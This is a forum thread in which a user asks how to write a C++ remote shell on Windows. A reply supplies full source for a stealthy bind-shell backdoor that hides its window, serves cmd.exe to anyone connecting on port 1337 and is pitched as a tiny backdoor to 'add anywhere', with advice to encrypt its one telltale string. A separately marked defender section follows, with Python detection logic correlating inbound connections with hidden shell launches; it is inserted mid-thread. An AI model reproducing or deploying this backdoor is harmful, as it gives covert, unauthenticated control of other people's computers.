Winsock Remote Shell

This topic is 4664 days old which is more than the 365 day threshold we allow for new replies. Please post a new topic.

Hi. Does anyone know how to make a remote shell in C++ using STARTUPINFO and CreateProcess... I can do it in assembly but it seems a pain to write out so much code... thanks

Here is some code I made back in my hacking days... enjoy


/*
portSHell.cpp {$}{$}{$}{$}
//some code stolen from 3APA3A
//thanks:)
//m0dified by anonymous


perfect tiny backdoor to add anywhere
only string is cmd.exe (encrypt it)

I have never seen this done before outside of netcat
netcat is too big for our purposes when all we want is this
enjoy :@)

binds a shell to port 1337

[+] 3APA3A provides main code (piping stdin to socket)
[+] I add hide window functionality
[+] I add bind to port
[+] NEW STUFF
[+] you can connect after you disconnect
[+] you can have multiple connections

*/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>

int WINAPI WinMain(HINSTANCE,HINSTANCE,LPSTR,int)
{
WORD version;
WSADATA wsadata;
int err;
version = MAKEWORD(1,1);
err = WSAStartup(version, &wsadata);

SOCKET s = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
SOCKET s2 = WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

sockaddr_in sock;
memset(&sock,0,sizeof(sock));
sock.sin_addr.s_addr = INADDR_ANY;
sock.sin_family = AF_INET;
sock.sin_port = htons(1337);
bind(s,(sockaddr*)&sock,sizeof(sock));


/* g0tcha l00k here!!!!!!!!!!!!!!!!!!!!!!
i added the while(1) to keep it looping*/

while(1)
{

listen(s,3);

int size = sizeof(sock);
s2 = accept(s,(sockaddr *)&sock,&size);


/* this is where 3APAPA comes in*/
STARTUPINFO si;
PROCESS_INFORMATION pi;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)s2;
si.wShowWindow = SW_HIDE;
CreateProcess(
NULL,
"cmd.exe",
NULL,
NULL,
TRUE,
0,
0,
NULL,
&si,
&pi
);

/*end 3apapa */
}
return(0);
}

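For defenders, the behaviour of the code above (a process accepts a TCP connection and immediately starts a hidden cmd.exe as its child) shows up when process-creation and network-connection telemetry are correlated. The following is an added example, not part of the original thread: it assumes Sysmon-style records (Event ID 1 and Event ID 3), all sample values are constructed, and `ev`, `when` and `find_socket_shells` are hypothetical names.

```python
from datetime import datetime, timedelta

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def ev(eid, time, **fields):
    """Build one constructed Sysmon-style record (sample data, not real telemetry)."""
    return {"EventID": eid, "UtcTime": "2024-01-01 " + time, **fields}

# Constructed events. Field names follow Sysmon Event ID 3 (network connection)
# and Event ID 1 (process creation); GUIDs, paths and addresses are made up.
EVENTS = [
    # Listener accepts a connection on 1337, then starts cmd.exe one second later.
    ev(3, "10:00:00", ProcessGuid="{A}", Image=r"C:\Games\helper.exe",
       Initiated="false", SourceIp="203.0.113.7", DestinationPort="1337"),
    ev(1, "10:00:01", ParentProcessGuid="{A}", ParentImage=r"C:\Games\helper.exe",
       Image=r"C:\Windows\System32\cmd.exe"),
    # Interactive shell started by Explorer: no inbound connection on the parent.
    ev(1, "10:05:00", ParentProcessGuid="{B}", ParentImage=r"C:\Windows\explorer.exe",
       Image=r"C:\Windows\System32\cmd.exe"),
    # Server that accepts connections but spawns a shell only ten minutes later.
    ev(3, "11:00:00", ProcessGuid="{C}", Image=r"C:\Games\server.exe",
       Initiated="false", SourceIp="198.51.100.9", DestinationPort="27015"),
    ev(1, "11:10:00", ParentProcessGuid="{C}", ParentImage=r"C:\Games\server.exe",
       Image=r"C:\Windows\System32\cmd.exe"),
]

def when(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S")

def find_socket_shells(events, window=timedelta(seconds=5)):
    """Flag shells whose parent accepted an inbound TCP connection within `window`."""
    inbound = {}  # ProcessGuid -> [(time, remote ip, local port)]
    for e in events:
        # Assumption: for Initiated == "false" the Destination* fields are the local listener.
        if e["EventID"] == 3 and e["Initiated"] == "false":
            inbound.setdefault(e["ProcessGuid"], []).append(
                (when(e), e["SourceIp"], int(e["DestinationPort"])))
    alerts = []
    for e in events:
        if e["EventID"] != 1 or e["Image"].rsplit("\\", 1)[-1].lower() not in SHELLS:
            continue
        for seen, remote, port in inbound.get(e["ParentProcessGuid"], []):
            # Absolute difference: log ordering between the two event types can skew.
            if abs(when(e) - seen) <= window:
                alerts.append({"parent": e["ParentImage"], "shell": e["Image"],
                               "remote": remote, "port": port})
                break
    return alerts

if __name__ == "__main__":
    for alert in find_socket_shells(EVENTS):
        print(alert)
```

Only the first pair of events is flagged; the Explorer-launched shell and the shell started ten minutes after the connection fall outside the rule.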
Thanks, whoever you are... I know it must sound sus but I'm just trying to have a remote shell so that the game dedicated server can be controlled by a remote admin or player. Anyway, thanks.
